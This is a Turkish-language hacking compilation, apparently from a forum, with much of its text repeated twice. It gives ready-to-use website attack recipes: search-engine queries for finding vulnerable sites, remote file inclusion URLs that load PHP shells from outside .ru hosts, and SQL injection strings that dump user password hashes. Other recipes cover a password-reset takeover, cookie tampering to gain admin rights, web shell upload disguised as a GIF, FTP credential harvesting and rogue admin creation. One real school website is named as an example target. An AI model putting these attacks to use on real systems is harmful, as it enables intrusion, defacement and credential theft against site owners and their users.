Bu Dosya ile Php-Nuke admin ekleme açığını kullanılır...
Kullanımı
google dan bulunmuş hedeflerden bir tanesi seçilir
dosyanın kaynak görüntülenir
kaynakta BURAYA EKLE diye arama(F3) yapılır
BURAYA EKLE nin yerine http://hedefsite.com/v-web/portal/73/admin.php şeklinde düzenlenir
ve son olarak kaydedilip sayfa yenilenir
Admim Oluştur a tıklandığında hedef sitede kullanıcı adı ve şifresi newadmin olan yeni bi admin oluşur
http://hedefsite.com/v-web/portal/73/admin.php adresinden admin girişi yapılıp index basılır
NOT: bu açık eski ama google da 520 sonuç çıkıyo
------------------------------------------------------------------------------------------------------------------
arama motorlarında allinurl:"com_uhp" kodunu aratın ve sitenin sonuna
administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://rst.****.ru/download/r57shell.txt?
kodunu ekleyin.
------------------------------------------------------------------------------------------------------------------
ADIM 1 : bu kodu googlede aynen su sekilde aratin : aSgbookPHP v1.4
(msn veya yahooda da aratabilirsiniz)
karsınıza bircok sitenin ziyaret defteri cıkacak
bu sitelerden rastgele bi tanesine girin ve MESAJ GÖNDER secenegine basın
ADI : Hacked by ( Orasini siz bilirisniz ) )
E-mail : boş birakin )
ŞEHİR : en onemli yer burasıdır arkadaslar buraya kodların içine gizlenmiş indeximiz var bu kodu (şehir memleket il veya neredensin hepsinde aynı kod yazılaccak) ŞEHİR yazan kısma yapıştırın
işte KOD : </br>/<img src=Buraya Resim Adresi><br><br>
WEB sayfa : boş bırakın ...
kodumuz : inurl:thebox/thebox.php
Bunu tarattıktan sonra karşınıza çıkan sitelerden birini açın we browser adres cubugunuzda site adresi şöyle çıkacak
http://www.martin-buber-oberschule.de/thebox/thebox.php
burdakı thebox.php silin yerine şunu yapıştırın
/admin.php?act=write&username=CLK-J35&password=111&aduser=CLK-J35&adpass=111
YAPIŞTIRIN sonra sizi gırışe yonlendırecektır
USER:CLK-J35
PASWORD:111
BUNLARI GIRDIKTEN SONRA ADMIN PANELI ELINIZDE
Alıntıdır...
------------------------------------------------------------------------------------------------------------------
smf hack %50
1-) siteye girip üye oluruz
2-) adminin adını öğreniriz
3-) http:// site adıı /index.php?action=reminder e girip adminin adıınıı yazııp e posta gönder deriz
4-)aynıı şşekilde bu adımı tekrarlayıp kendi adımızı yazarız e posta olarak gönderi tıklarız.
eweet şimdi mail e postamıza gelmiş olmalı önemsiz postalarada gelmiş olabilir
gelen e postayı açıp içindeki aktivasyon kodunda oynama yaparız nasılmı
böyle--> ttp:// site adıı /index.php?action=reminder;sa=setpassword;u=1;code= 6801125ef8 kod bu şöyle oynacaz
ftp:// site adıı /index.php?action=reminder;sa=setpassword;u=burdaya bir yazcam ;code=6801125ef8
kırmızıyla yazan yeri 1 yaparız
[neden 1 çünkü siteye ilk üye olan kişşi smf de %100 admin dir ]
ewet şimdi karşımızda şifre paneli,buraya kendi şifrenizi yazın ve siteye adminin adıyla buraya yazdıgınız şifreyle giriş yapın site size ait
dediniz index nası bascaz ozaman işte adres burda http:// site adı.com/index.php?action=theme;th=4;sesc=1c6efd0ce0a037d1a 85d289e3a059e28;sa=edit;filename=index.template.ph p
burda kutucuklarda önünüze gelen yere index kodunuzu yapıştırın
index kod yok diosanız bu sitede biraz dolaşın indexte bulursunuz.
------------------------------------------------------------------------------------------------------------------
google aratma kodumuz: inurl:index.php?option=com_expose
İLk önce bu kodu googlede aratıyoruz..!
es/index.php?option=com_expose böyle aratırız bakın ben es koydum es ispanyanın domain uzantısıdır.Siz Diğer ülkelerin uzantılarını koyarak aratacağınız siteleri çoğalta bilirsiniz.örneğin: it/index.php?option=com_expose böyle aratırsakda italyan siteleri çıkar.Neyse siteler açıldı.Çıkan sitelerin sonuna
administrator/components/com_expose/uploadimg.php
bu kodu ekliyecez..
yhanee http://www.siteadı.com/administrator.../uploadimg.php
şeklinde olacak. daha sonra karşımıza upload kısmı geliyor ve biz burdan shellimizi upload ediyoruz siteye..
bir uyarı gelirse shellimiz siteye upload olmuş demektir.. ama daha upload etmeden önce söliyeyim shell kodlarımızın en başına şu odu eklememiz gerekmektedir.. GIF89;a
eklediktn sonra farklı kaydet diyerek kaydediyoruz. ama php olarak kaydediyoruz..
upload ettikten sonra sitenin sonuna şu kodu ekliyoruz..
/components/com_expose/expose/img/shelladı.php
yhanee /components/com_expose/expose/img/r57.php veya /components/com_expose/expose/img/c99.php şeklinde.
ÖRN: http://www.siteadı.com/components/co...g/shelladı.php
böle yapıp enter e basıyoruz eğer sitede açık varsa shell e bağlanıp istediğimizi yapacaz ama bunu yapmak için sabır gerekli bunuda unutmayın..!
-----------------------------------------------------------------------------------------------------------------
Kod:
inurl:ws_ftp.ini
yazıyoruz ve ara diyoruz
karşımıza bir sürü sitenin ws_ftp.ini leri çıktı. Bu dosyayı bilgisayarımıza indirip Not Defteri ile açıyoruz.tabi ki kullanıcı adı ve parolası sifrelenmis bicimde olucak onuda kırmak sıze kalıyor..
Sifrelenmiş parolalar Örn : e59e34296cbe231f485658e5e3653f7a Şeklindedir ..
Bunları Kırmak için ;
bu sitede cracklemeye calisicagiz sitenin adresi
http://gdataonline.com/seekhash.php
yukardaki site cracklemeyi basaramassa bir baska site de denicegiz sitenin adressi
http://milw0rm.com/cracker/insert.php
------------------------------------------------------------------------------------------------------------------
-VİRTUAL WAR V.1.0
ilk önce www.google.com ’Powered by: Virtual War v1.5.0’
Sonu /war.php olan siteleri seçiyoruz ve
war.php kısmı siliyoruz ’includes/get_header.php?vwar_root=http: //www.tuningclub.ch/config.dat?’ kodunu ekliyoruz.
Artık admin palenelindeyiz
[Eski bir açık olduğu için sonuç alamayabilirsiniz]
-----------------------------------------------------------------------------------------------------------------
-PHPBB 2.0.11
Bize gereken en önemli program :
http://www.topshareware.com/cookie-E...nsfer-4659.htm [Cooike Editör]
Kurban sitemizi seçiyoruz ve üye oluyoruz üye girşi yaparken ’BENİ HATIRLA’ diyoruz ve siteye giriyoruz.
Daha sonra cooike editörümüzü açıyoruz önümüze şimdiye kadar girdiğimiz sitelerin isimler gelicek biz bunların arasından
kurban phpbb 2.0.11 sitemizi seçicez.
Sitemizi bulduk 2 kez tıklıyoruz.
Önümüze a%3A2%3A%7Bs%3A11%3A“autolog inid“%3Bs%3A0%3A%2 2“%3Bs%3A6%3A“userid“%3B s%3A1%3A“2“%3B%7D Gibi Abudik
Kubidik Kodlar Gelicek Üssteki Kodu Slip
a%3A2%3A%7Bs%3A11%3A“autolog inid“%3Bb%3A1%3Bs% 3A6%3A“userid“%3Bs%3A1%3A% 222“%3B%7D Bu kodu yeryeştiriyoruz
Saveliyoruz.
Sitemizi yeniliyoruz bakıyoruz aaaa adminiz
-----------------------------------------------------------------------------------------------------------------
XOOPs MYADS MODULE SQL-INJECTİON VULNERABİLİT
WWW.Google.Com ’inurl:modules/myAds/’
Karşımıza çıkan siteleri şu şekilde değiştiriyoruz.
http://www.site.com/modules/myAds/an...rs+limit+1*1/*
Ve Md5 LER karşımızda
------------------------------------------------------------------------------------------------------------------
JetBox CMS Remote File Include [ RFI ]
Acik henuz Yeni cikti.. ve bu yuzden herzaman ki gibi milyonlarca site hackLeme sansiniz var..
Uretici Firma : http://jetbox.streamedge.com/
JetBox CMS Remote File Include
http://[buraya site adresi] /includes/phpdig/includes/config.php?relative_script_pat h=shell URL adresiniz..
GoogLe arama : Powered by Jetbox
------------------------------------------------------------------------------------------------------------------
********>********="http://sitenin adresi.com/"</script> Buda Yönlendirme Kodu lazım Olabilir Diye Koydum
------------------------------------------------------------------------------------------------------------------
Sql kodu : viewcat.php?cid=9999999 union select 1111,concat(char(117,115,101,114,110,97,109,101,58 ),uname,char(32,112,97,115,115,119,111,114,100,58) ,pass) from xoops_users where uid like 1/*
Google Arama kodumuz : "myAlbum-P 2.0"
Sonra MD5LER gelicek
md5i kırmak için prog. veya sitelerden yararlanabilirsiniz
-----------------------------------------------------------------------------------------------------------------
googlede:
inurl:"index.php?option=com_simplefaq"
siteye
index.php?option=com_simplefaq&task=answer&Itemid= 9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0/**/from/**/mos_users/*
Sitenin Sonuna Ekleyin MD5ler Sizindir
------------------------------------------------------------------------------------------------------------------
Google araması = inrul:com_artlinks
RFI KOD = /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması= inurl:com_smf
RFI KOD= /components/com_smf/smf.php?mosConfig_absolute_path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _- - _ _ - _ _ _ __ _ _ -_ _
Google araması = /admin/editeur/spaw_control.class.php
RFI KOD = /sitepath/admin/editeur/spaw_control.class.php?spaw_root=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ __ _ __ __ _ _ _ _ _ _ _ _ _ __ _ _ _ _
Google araması = phpbb_root_path
RFI KOD = /[phpbb_xs]/includes/functions.php?phpbb_root_path=http://depo2.nm.ru/y2.php?
_ _ _ __ _ _ _ _ _ _ _ _ _ _ _ _ _ __ _ _ _ _ __ _ _ _ __ _ _
Google araması = com_serverstat
RFI KODU = /components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=htt p://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = Home_Path
RFI KODU = /enc/content.php?Home_Path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = yesno.phtml
RFI KODU = /wamp_dir/setup/yesno.phtml?no_url=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = inurl:absolute_path
RFI KOD = /[path]/centipaid_class.php?absolute_path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = settings.php
RFI KOD= /[incCMS_path]/inc/settings.php?inc_dir=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = com_loudmounth
RFI KOD = /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = index.php?option=com_pcchess
RFI KODU = /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = Virtual War v1.5.0
RFI KOD = /admin/admin.php?vwar_root=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = JawsDB.php
RFI KODU = /jaws_PATH/html/include/JawsDB.php?path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = form_org.inc.php
RFI KOD = /Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması =country_insert.php
RFI KDO = /Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = config.php
RFI KOD = /dir_thatware/config.php?root_path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = admin.colophon.php
RFI KOD = /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = configinsert.php
RFI KOD:= /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = lang.php
RFI KOD = /components/com_securityimages/lang.php?mosConfig_absolute_path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = general.php
RFI KOD= /polaring_dir/view/general.php?_SESSION['dirMain']=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = template.php
RFI KOD= /webnews/template.php?content_page=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = mysql.php
RFI KOD = /zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = /src/Login.php
RFI KOD = /dir_spaminator/src/Login.php?page=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = BaseCommand.php
BaseLoader.php
BaseView.php
RFI KOD = /dir_mvcnphp/BaseCommand.php?glConf[path_libraries]=http://depo2.nm.ru/y2.php?
/dir_mvcnphp/BaseLoader.php?glConf[path_libraries]=http://depo2.nm.ru/y2.php?
/dir_mvcnphp/BaseView.php?glConf[path_libraries]=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = article-raw.php
RFI KOD = /Dir_phNNTP/article-raw.php?file_newsportal=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = phpMyProfiler
RFI KOD = /[path]/functions.php?pmp_rel_path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = activeutil.php?
RFI KOD = /[path]/lib/activeutil.php?set[include_path]=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = pagename
RFI KOD = /index.php?pagename=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = help.mgm.php
RFI KOD = /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması =selectlang.php
RFI KOD = : /[target]/[path]/lib/selectlang.php?BBC_LANGUAGE_PATH=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = serveroffline.php
RFI KOD = /PaTh/index.php?rootpath=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = ezboard-parse
RFI KOD = /ezconvert/config.php?ezconvert_dir=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = inurl:thebox/thebox.php
RFI KOD = /admin.php?act=write&username=CLK-J35&password=111&aduser=CLK-J35&adpass=111
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = powered by geeklog
RFI KOD = /system/libraries/Geeklog/MVCnPHP/BaseView.php?glConf[path_libraries]=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = inhalt.php
RFI KOD = /[target]/[path]/inhalt.php?dateien[news]=http://depo2.nm.ru/y2.php?
-----------------------------------------------------------------------------------------------------------------
Google Arama Kodları:
upload.asp
upload_file.asp
Kesin Bişey İçin public/upload_file.asp
Çıkan Upload Bölümünden Efsoyu Upload Ediyorsunuz
+rap pls
Kullanımı
google dan bulunmuş hedeflerden bir tanesi seçilir
dosyanın kaynak görüntülenir
kaynakta BURAYA EKLE diye arama(F3) yapılır
BURAYA EKLE nin yerine http://hedefsite.com/v-web/portal/73/admin.php şeklinde düzenlenir
ve son olarak kaydedilip sayfa yenilenir
Admim Oluştur a tıklandığında hedef sitede kullanıcı adı ve şifresi newadmin olan yeni bi admin oluşur
http://hedefsite.com/v-web/portal/73/admin.php adresinden admin girişi yapılıp index basılır
NOT: bu açık eski ama google da 520 sonuç çıkıyo
------------------------------------------------------------------------------------------------------------------
arama motorlarında allinurl:"com_uhp" kodunu aratın ve sitenin sonuna
administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://rst.****.ru/download/r57shell.txt?
kodunu ekleyin.
------------------------------------------------------------------------------------------------------------------
ADIM 1 : bu kodu googlede aynen su sekilde aratin : aSgbookPHP v1.4
(msn veya yahooda da aratabilirsiniz)
karsınıza bircok sitenin ziyaret defteri cıkacak
bu sitelerden rastgele bi tanesine girin ve MESAJ GÖNDER secenegine basın
ADI : Hacked by ( Orasini siz bilirisniz ) )
E-mail : boş birakin )
ŞEHİR : en onemli yer burasıdır arkadaslar buraya kodların içine gizlenmiş indeximiz var bu kodu (şehir memleket il veya neredensin hepsinde aynı kod yazılaccak) ŞEHİR yazan kısma yapıştırın
işte KOD : </br>/<img src=Buraya Resim Adresi><br><br>
WEB sayfa : boş bırakın ...
kodumuz : inurl:thebox/thebox.php
Bunu tarattıktan sonra karşınıza çıkan sitelerden birini açın we browser adres cubugunuzda site adresi şöyle çıkacak
http://www.martin-buber-oberschule.de/thebox/thebox.php
burdakı thebox.php silin yerine şunu yapıştırın
/admin.php?act=write&username=CLK-J35&password=111&aduser=CLK-J35&adpass=111
YAPIŞTIRIN sonra sizi gırışe yonlendırecektır
USER:CLK-J35
PASWORD:111
BUNLARI GIRDIKTEN SONRA ADMIN PANELI ELINIZDE
Alıntıdır...
------------------------------------------------------------------------------------------------------------------
smf hack %50
1-) siteye girip üye oluruz
2-) adminin adını öğreniriz
3-) http:// site adıı /index.php?action=reminder e girip adminin adıınıı yazııp e posta gönder deriz
4-)aynıı şşekilde bu adımı tekrarlayıp kendi adımızı yazarız e posta olarak gönderi tıklarız.
eweet şimdi mail e postamıza gelmiş olmalı önemsiz postalarada gelmiş olabilir
gelen e postayı açıp içindeki aktivasyon kodunda oynama yaparız nasılmı
böyle--> ttp:// site adıı /index.php?action=reminder;sa=setpassword;u=1;code= 6801125ef8 kod bu şöyle oynacaz
ftp:// site adıı /index.php?action=reminder;sa=setpassword;u=burdaya bir yazcam ;code=6801125ef8
kırmızıyla yazan yeri 1 yaparız
[neden 1 çünkü siteye ilk üye olan kişşi smf de %100 admin dir ]
ewet şimdi karşımızda şifre paneli,buraya kendi şifrenizi yazın ve siteye adminin adıyla buraya yazdıgınız şifreyle giriş yapın site size ait
dediniz index nası bascaz ozaman işte adres burda http:// site adı.com/index.php?action=theme;th=4;sesc=1c6efd0ce0a037d1a 85d289e3a059e28;sa=edit;filename=index.template.ph p
burda kutucuklarda önünüze gelen yere index kodunuzu yapıştırın
index kod yok diosanız bu sitede biraz dolaşın indexte bulursunuz.
------------------------------------------------------------------------------------------------------------------
google aratma kodumuz: inurl:index.php?option=com_expose
İLk önce bu kodu googlede aratıyoruz..!
es/index.php?option=com_expose böyle aratırız bakın ben es koydum es ispanyanın domain uzantısıdır.Siz Diğer ülkelerin uzantılarını koyarak aratacağınız siteleri çoğalta bilirsiniz.örneğin: it/index.php?option=com_expose böyle aratırsakda italyan siteleri çıkar.Neyse siteler açıldı.Çıkan sitelerin sonuna
administrator/components/com_expose/uploadimg.php
bu kodu ekliyecez..
yhanee http://www.siteadı.com/administrator.../uploadimg.php
şeklinde olacak. daha sonra karşımıza upload kısmı geliyor ve biz burdan shellimizi upload ediyoruz siteye..
bir uyarı gelirse shellimiz siteye upload olmuş demektir.. ama daha upload etmeden önce söliyeyim shell kodlarımızın en başına şu odu eklememiz gerekmektedir.. GIF89;a
eklediktn sonra farklı kaydet diyerek kaydediyoruz. ama php olarak kaydediyoruz..
upload ettikten sonra sitenin sonuna şu kodu ekliyoruz..
/components/com_expose/expose/img/shelladı.php
yhanee /components/com_expose/expose/img/r57.php veya /components/com_expose/expose/img/c99.php şeklinde.
ÖRN: http://www.siteadı.com/components/co...g/shelladı.php
böle yapıp enter e basıyoruz eğer sitede açık varsa shell e bağlanıp istediğimizi yapacaz ama bunu yapmak için sabır gerekli bunuda unutmayın..!
-----------------------------------------------------------------------------------------------------------------
Kod:
inurl:ws_ftp.ini
yazıyoruz ve ara diyoruz
karşımıza bir sürü sitenin ws_ftp.ini leri çıktı. Bu dosyayı bilgisayarımıza indirip Not Defteri ile açıyoruz.tabi ki kullanıcı adı ve parolası sifrelenmis bicimde olucak onuda kırmak sıze kalıyor..
Sifrelenmiş parolalar Örn : e59e34296cbe231f485658e5e3653f7a Şeklindedir ..
Bunları Kırmak için ;
bu sitede cracklemeye calisicagiz sitenin adresi
http://gdataonline.com/seekhash.php
yukardaki site cracklemeyi basaramassa bir baska site de denicegiz sitenin adressi
http://milw0rm.com/cracker/insert.php
------------------------------------------------------------------------------------------------------------------
-VİRTUAL WAR V.1.0
ilk önce www.google.com ’Powered by: Virtual War v1.5.0’
Sonu /war.php olan siteleri seçiyoruz ve
war.php kısmı siliyoruz ’includes/get_header.php?vwar_root=http: //www.tuningclub.ch/config.dat?’ kodunu ekliyoruz.
Artık admin palenelindeyiz
[Eski bir açık olduğu için sonuç alamayabilirsiniz]
-----------------------------------------------------------------------------------------------------------------
-PHPBB 2.0.11
Bize gereken en önemli program :
http://www.topshareware.com/cookie-E...nsfer-4659.htm [Cooike Editör]
Kurban sitemizi seçiyoruz ve üye oluyoruz üye girşi yaparken ’BENİ HATIRLA’ diyoruz ve siteye giriyoruz.
Daha sonra cooike editörümüzü açıyoruz önümüze şimdiye kadar girdiğimiz sitelerin isimler gelicek biz bunların arasından
kurban phpbb 2.0.11 sitemizi seçicez.
Sitemizi bulduk 2 kez tıklıyoruz.
Önümüze a%3A2%3A%7Bs%3A11%3A“autolog inid“%3Bs%3A0%3A%2 2“%3Bs%3A6%3A“userid“%3B s%3A1%3A“2“%3B%7D Gibi Abudik
Kubidik Kodlar Gelicek Üssteki Kodu Slip
a%3A2%3A%7Bs%3A11%3A“autolog inid“%3Bb%3A1%3Bs% 3A6%3A“userid“%3Bs%3A1%3A% 222“%3B%7D Bu kodu yeryeştiriyoruz
Saveliyoruz.
Sitemizi yeniliyoruz bakıyoruz aaaa adminiz
-----------------------------------------------------------------------------------------------------------------
XOOPs MYADS MODULE SQL-INJECTİON VULNERABİLİT
WWW.Google.Com ’inurl:modules/myAds/’
Karşımıza çıkan siteleri şu şekilde değiştiriyoruz.
http://www.site.com/modules/myAds/an...rs+limit+1*1/*
Ve Md5 LER karşımızda
------------------------------------------------------------------------------------------------------------------
JetBox CMS Remote File Include [ RFI ]
Acik henuz Yeni cikti.. ve bu yuzden herzaman ki gibi milyonlarca site hackLeme sansiniz var..
Uretici Firma : http://jetbox.streamedge.com/
JetBox CMS Remote File Include
http://[buraya site adresi] /includes/phpdig/includes/config.php?relative_script_pat h=shell URL adresiniz..
GoogLe arama : Powered by Jetbox
------------------------------------------------------------------------------------------------------------------
********>********="http://sitenin adresi.com/"</script> Buda Yönlendirme Kodu lazım Olabilir Diye Koydum
------------------------------------------------------------------------------------------------------------------
Sql kodu : viewcat.php?cid=9999999 union select 1111,concat(char(117,115,101,114,110,97,109,101,58 ),uname,char(32,112,97,115,115,119,111,114,100,58) ,pass) from xoops_users where uid like 1/*
Google Arama kodumuz : "myAlbum-P 2.0"
Sonra MD5LER gelicek
md5i kırmak için prog. veya sitelerden yararlanabilirsiniz
-----------------------------------------------------------------------------------------------------------------
googlede:
inurl:"index.php?option=com_simplefaq"
siteye
index.php?option=com_simplefaq&task=answer&Itemid= 9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0/**/from/**/mos_users/*
Sitenin Sonuna Ekleyin MD5ler Sizindir
------------------------------------------------------------------------------------------------------------------
Google araması = inrul:com_artlinks
RFI KOD = /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması= inurl:com_smf
RFI KOD= /components/com_smf/smf.php?mosConfig_absolute_path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _- - _ _ - _ _ _ __ _ _ -_ _
Google araması = /admin/editeur/spaw_control.class.php
RFI KOD = /sitepath/admin/editeur/spaw_control.class.php?spaw_root=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ __ _ __ __ _ _ _ _ _ _ _ _ _ __ _ _ _ _
Google araması = phpbb_root_path
RFI KOD = /[phpbb_xs]/includes/functions.php?phpbb_root_path=http://depo2.nm.ru/y2.php?
_ _ _ __ _ _ _ _ _ _ _ _ _ _ _ _ _ __ _ _ _ _ __ _ _ _ __ _ _
Google araması = com_serverstat
RFI KODU = /components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=htt p://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = Home_Path
RFI KODU = /enc/content.php?Home_Path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = yesno.phtml
RFI KODU = /wamp_dir/setup/yesno.phtml?no_url=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = inurl:absolute_path
RFI KOD = /[path]/centipaid_class.php?absolute_path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = settings.php
RFI KOD= /[incCMS_path]/inc/settings.php?inc_dir=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = com_loudmounth
RFI KOD = /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = index.php?option=com_pcchess
RFI KODU = /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = Virtual War v1.5.0
RFI KOD = /admin/admin.php?vwar_root=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = JawsDB.php
RFI KODU = /jaws_PATH/html/include/JawsDB.php?path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = form_org.inc.php
RFI KOD = /Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması =country_insert.php
RFI KDO = /Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = config.php
RFI KOD = /dir_thatware/config.php?root_path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = admin.colophon.php
RFI KOD = /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = configinsert.php
RFI KOD:= /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://depo2.nm.ru/y2.php?
